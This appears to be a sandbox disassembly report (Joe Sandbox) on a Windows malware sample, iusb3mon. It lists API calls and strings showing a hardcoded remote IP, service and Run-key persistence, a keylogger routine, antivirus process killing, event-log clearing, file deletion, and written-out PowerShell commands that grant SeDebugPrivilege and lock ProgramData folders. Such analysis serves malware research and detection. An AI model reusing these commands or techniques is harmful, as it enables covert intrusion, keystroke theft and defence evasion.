                                                                                                                    • String ID: 202.79.169.178$ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                    • API String ID: 2238633743-379344981
                                                                                                                    • Opcode ID: d8548afc37d06a88313b45227a81c8f9cf6d41478c5c590be9529354f8e53bc7
                                                                                                                    • Instruction ID: 123f93acb0e19ddffca52e3d581723ba8cb53540d34c048c7cd7aa1c6960a6cd
                                                                                                                    • Opcode Fuzzy Hash: d8548afc37d06a88313b45227a81c8f9cf6d41478c5c590be9529354f8e53bc7
                                                                                                                    • Instruction Fuzzy Hash: E3B1A574554B85AEE771AF32CC85D6BBEE1EF80B00B024D2DF8E645920E7B1A891DF40
                                                                                                                    Function 06246D6C Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 168serviceregistrystringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,202.79.169.178,0626CC34,00000000), ref: 06246DA1
                                                                                                                    • wsprintfA.USER32 ref: 06246E5A
                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 06246E7F
                                                                                                                    • CreateServiceA.ADVAPI32(00000000,?,0626CA80,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 06246EB8
                                                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 06246EC5
                                                                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000001,0626CA80), ref: 06246EE9
                                                                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 06246F64
                                                                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 06246F70
                                                                                                                    • GetLastError.KERNEL32 ref: 06246F7E
                                                                                                                    • OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 06246F99
                                                                                                                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 06246FAC
                                                                                                                    • StartServiceA.ADVAPI32(?,00000000,00000000), ref: 06246FBA
                                                                                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 06246FFA
                                                                                                                    • lstrlenA.KERNEL32(06246D4E), ref: 06247003
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,06246D4E,00000000), ref: 0624701A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$Open$ChangeConfig2DatabaseStart$CreateErrorFileLastLockManagerModuleNameUnlockValuelstrlenwsprintf
                                                                                                                    • String ID: 202.79.169.178$C:\Windows\svchost.exe$Description$SYSTEM\CurrentControlSet\Services\
                                                                                                                    • API String ID: 432064258-1740475274
                                                                                                                    • Opcode ID: 1c499ea69e0c07b1d6b61d38041224488480c8704969e656d397b5ef96809292
                                                                                                                    • Instruction ID: 13f451ca4421f7074ee0c42abb46a7cd84cdef55abd3859bbadade830e944150
                                                                                                                    • Opcode Fuzzy Hash: 1c499ea69e0c07b1d6b61d38041224488480c8704969e656d397b5ef96809292
                                                                                                                    • Instruction Fuzzy Hash: CA7139718043A8EFEB729F64DC8CB99BBB9AB09744F0440D9E64CA6151C7765F84CF21
                                                                                                                    Function 06245792 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103libraryloaderprocessCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(userenv.dll), ref: 062457A6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 062457B7
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 062457FF
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 0624580F
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 06245826
                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 06245836
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06245839
                                                                                                                    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 0624584F
                                                                                                                    • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 0624587B
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0624588D
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06245892
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 062458A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser
                                                                                                                    • String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$WinSta0\Default$userenv.dll
                                                                                                                    • API String ID: 1797627335-1926497751
                                                                                                                    • Opcode ID: 15d3239fab9c3410f4b453fc4f050f20525c81d9eccb0c2196f761c2691084bb
                                                                                                                    • Instruction ID: 075aa35bb369b9992d7fe2da3bbab2dc317aaa58cb652196164a681abd05068c
                                                                                                                    • Opcode Fuzzy Hash: 15d3239fab9c3410f4b453fc4f050f20525c81d9eccb0c2196f761c2691084bb
                                                                                                                    • Instruction Fuzzy Hash: 2C31CFB1D11329ABDB20ABE5DC89EDEBFB9EF08650F110056F605B2150D6B09A80DFA0
                                                                                                                    Function 06242BF0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 164keyboardsynchronizationsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 06242C05
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 06242C0E
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 06242C6E
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 06242C7B
                                                                                                                    • GetKeyState.USER32(00000010), ref: 06242CD9
                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 06242CEC
                                                                                                                    • GetKeyState.USER32(00000014), ref: 06242CF9
                                                                                                                    • GetKeyState.USER32(00000014), ref: 06242D25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
                                                                                                                    • String ID: <BackSpace>$<Enter>$KeyLogger
                                                                                                                    • API String ID: 2104880762-1889060070
                                                                                                                    • Opcode ID: e691c9f66dbc9f676ac70837f89fbdf9c45f713bc5a9a3a0d10f4591459b0932
                                                                                                                    • Instruction ID: 91edc768257ea98d842e5a21f29c557d4307e2a6240f378abc477f90ada5dce2
                                                                                                                    • Opcode Fuzzy Hash: e691c9f66dbc9f676ac70837f89fbdf9c45f713bc5a9a3a0d10f4591459b0932
                                                                                                                    • Instruction Fuzzy Hash: A151D271D22729EFDFA8BBA6DC4CB9A7769AF40311F0140A1FE15A7180D6308B41CF62
                                                                                                                    Function 0624628E Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 46processsleepshutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06241F38: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F56
                                                                                                                      • Part of subcall function 06245CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                      • Part of subcall function 06245CE6: Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                      • Part of subcall function 06245CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                      • Part of subcall function 06245CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 062462D7
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 062462DF
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 062462E7
                                                                                                                    • Sleep.KERNEL32(00001388), ref: 06246301
                                                                                                                    • ExitWindowsEx.USER32(00000000,00000000), ref: 06246309
                                                                                                                    Strings
                                                                                                                    • C:\Windows\System32\SrpUxNativeSnapIn.dll, xrefs: 062462EB
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06246294
                                                                                                                    • Microsoft, xrefs: 0624628F
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 062462DA
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 062462D2
                                                                                                                    • 360Tray.exe, xrefs: 062462BB
                                                                                                                    • 360tray.exe, xrefs: 062462AA
                                                                                                                    • powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 062462E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exec$Process32$CloseCreateExitFirstHandleNextOpenSleepSnapshotToolhelp32Windows
                                                                                                                    • String ID: 360Tray.exe$360tray.exe$C:\Windows\System32\SrpUxNativeSnapIn.dll$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
                                                                                                                    • API String ID: 3961968786-728021376
                                                                                                                    • Opcode ID: ec5a8584e8616de7385493f1f74537583ef85d8ff2e5bf229387d500881e4c9a
                                                                                                                    • Instruction ID: 3acaa9d49b47391f775721b0f9487f09df05d2c12a9ebffd5f34ed5f5145628e
                                                                                                                    • Opcode Fuzzy Hash: ec5a8584e8616de7385493f1f74537583ef85d8ff2e5bf229387d500881e4c9a
                                                                                                                    • Instruction Fuzzy Hash: 74F05422BB43567596E832B77C8DEAB2E18DED7E65711051DFD24A14C4DE90C1C0CA72
                                                                                                                    Function 06243C8E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624900F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0624901F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0624902A
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06249035
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624903F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0624904A
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06249092
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0624909A
                                                                                                                      • Part of subcall function 06248FF7: CloseHandle.KERNEL32(?), ref: 062490A9
                                                                                                                      • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490BA
                                                                                                                      • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490C5
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06243CAC
                                                                                                                    • Process32First.KERNEL32(?,00000128), ref: 06243CD5
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?,?,00000128,00000002,00000000), ref: 06243CFA
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 06243D07
                                                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 06243D17
                                                                                                                    • CloseHandle.KERNEL32(?,?,00000128,?,00000128,00000002,00000000), ref: 06243D23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$Load$CloseFreeHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege$explorer.exe
                                                                                                                    • API String ID: 1212985741-2721386251
                                                                                                                    • Opcode ID: 5bb825bc5f5c0bc06ea0bd0fa4fcd670abdedf3df68749a4f320f4b02f455c89
                                                                                                                    • Instruction ID: 97305db9bfe4ce3374cb338bff9c6883bdb2d1ab1e0858931c6ac0a756594768
                                                                                                                    • Opcode Fuzzy Hash: 5bb825bc5f5c0bc06ea0bd0fa4fcd670abdedf3df68749a4f320f4b02f455c89
                                                                                                                    • Instruction Fuzzy Hash: D111A932524315BAEBA4BA61ED06FDEB7B9DB04710F100066FF45E50D0DB719A914E54
                                                                                                                    Function 06242E2C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                    • DeleteFileA.KERNEL32(?,?,?,00000001), ref: 06242F67
                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,00000001), ref: 06242F8E
                                                                                                                    • RemoveDirectoryA.KERNEL32(?,?,?,00000001), ref: 06242F97
                                                                                                                      • Part of subcall function 06254539: __EH_prolog.LIBCMT ref: 0625453E
                                                                                                                      • Part of subcall function 062431FE: __EH_prolog.LIBCMT ref: 06243203
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindH_prolog$CloseDeleteDirectoryFirstNextRemove
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 360591376-438819550
                                                                                                                    • Opcode ID: d98ae5b2a6d3bb6ecbca7c81c7ea3ea0fc5a493c9b07df54d509d0f5133928ce
                                                                                                                    • Instruction ID: d9a3cc9023e3da995160b17b7b02cc3f032b63420ad22c404d42634ea69e104c
                                                                                                                    • Opcode Fuzzy Hash: d98ae5b2a6d3bb6ecbca7c81c7ea3ea0fc5a493c9b07df54d509d0f5133928ce
                                                                                                                    • Instruction Fuzzy Hash: 6341AF71D2120AEADB99FBA5DC88EEEB778AF18310F404159FD25E7190DB349B44CB50
                                                                                                                    Function 06243B39 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenEventLogA.ADVAPI32(00000000,06267C38), ref: 06243B93
                                                                                                                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 06243BA2
                                                                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 06243BA9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Event$ClearCloseOpen
                                                                                                                    • String ID: Application$Security$System
                                                                                                                    • API String ID: 1391105993-2169399579
                                                                                                                    • Opcode ID: acdb5db869df3fd690516aae1e5c613de7905647795eb4bb1c53f8963a82d760
                                                                                                                    • Instruction ID: 8922fbff29a079a6a1f25d88335e0650558795d0139f015fef1f7774908cdfd4
                                                                                                                    • Opcode Fuzzy Hash: acdb5db869df3fd690516aae1e5c613de7905647795eb4bb1c53f8963a82d760
                                                                                                                    • Instruction Fuzzy Hash: CC01B570D35A0DAFDBA4EF5AA848BEC7BB0EB04395F504095E901FA240E6344740CFA0
                                                                                                                    Function 001EA342 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,001EA660,?,00000000), ref: 001EA3DB
                                                                                                                    • GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,001EA660,?,00000000), ref: 001EA404
                                                                                                                    • GetACP.KERNEL32(?,?,001EA660,?,00000000), ref: 001EA419
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
